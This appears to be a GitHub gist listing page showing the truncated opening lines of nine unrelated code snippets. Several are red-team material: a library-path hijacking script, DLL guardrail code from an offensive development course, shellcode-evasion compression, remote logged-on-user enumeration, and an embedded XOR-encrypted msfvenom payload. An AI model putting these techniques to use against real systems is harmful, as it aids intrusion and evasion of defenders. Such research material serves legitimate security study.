This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# ./ld_path_exploit.sh /usr/lib/libgpg-error.so.0 top | |
TARGET_LIB=$1 | |
MISSING_SYMBOLS="$(readelf -s --wide ${TARGET_LIB} \ | |
| grep 'FUNC\|OBJECT' \ | |
| grep -v 'UND\|ABS' \ | |
| awk '{print $8}' \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <string> | |
#include <vector> | |
#include <algorithm> | |
// White Knight Labs - Offensive Development Course | |
// DLL Guardrails Example | |
// This function extracts the file name from a given path | |
// It is used later to determine the executable name loading the DLL. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
Compression using undocumented API in rdpbase.dll | |
RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH. | |
This code supports all except NCRUSH. | |
The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection. | |
NCRUSH compression appears to work but fails for decompression. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from requests.adapters import HTTPAdapter, Retry | |
from requests import Session | |
retries = Retry( | |
total=5, backoff_factor=1, status_forcelist=[502, 503, 504] | |
) | |
session = Session() # reuse tcp connection | |
session.mount("http://", HTTPAdapter(max_retries=retries)) | |
session.mount("https://", HTTPAdapter(max_retries=retries)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Author: Brandon Dalton (Red Canary Threat Research) | |
Date: 2023-12-07 | |
Summary: This script attempts to instrument the `sendEvent:event:` method of the ESCoreAnalytics class. | |
- Download this script | |
- Target: You're targeting `endpointsecurityd`, so grab its PID: `sudo launchctl list | grep endpointsecurityd` | |
- To run: `sudo frida -p $PID -l es_coreanalytics_event_subs.js` | |
*/ | |
const eventTypeMapping = { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Install-DbgHelp { | |
param ( | |
[Parameter(Mandatory=$true, Position=0)] | |
[string] $DbgHelpBaseDir, | |
[Parameter()] | |
[string[]] $DbgHelpFiles = @('dbghelp.dll','symsrv.dll','srcsrv.dll'), | |
[Parameter()] | |
[switch] $Cleanup |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Security.Principal; | |
using System.Text.RegularExpressions; | |
/* | |
PoC To enumerate logged on users on a remote system using the winreg named pipe. | |
Based on the work of Rohan Vazarkar (@cptjesus) and Antonio Cocomazzi (@splinter_code). | |
RemoteRegistry service must be enabled (default) for this to work. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdint> | |
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe | |
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef | |
unsigned char buf[] = | |
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32" | |
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36" | |
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c" | |
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// By [Colin Finck] and used by the [Comprehensive Rust] course, | |
// developed by the Android team at Google. | |
// | |
// This code compiles warning-free at the default warning level, | |
// even in the latest GCC version (13.2 as of writing). | |
// | |
// [Colin Finck]: https://colinfinck.de/Master_Thesis_Slides.pdf | |
// [Comprehensive Rust]: https://github.com/google/comprehensive-rust | |
#include <stdio.h> |
NewerOlder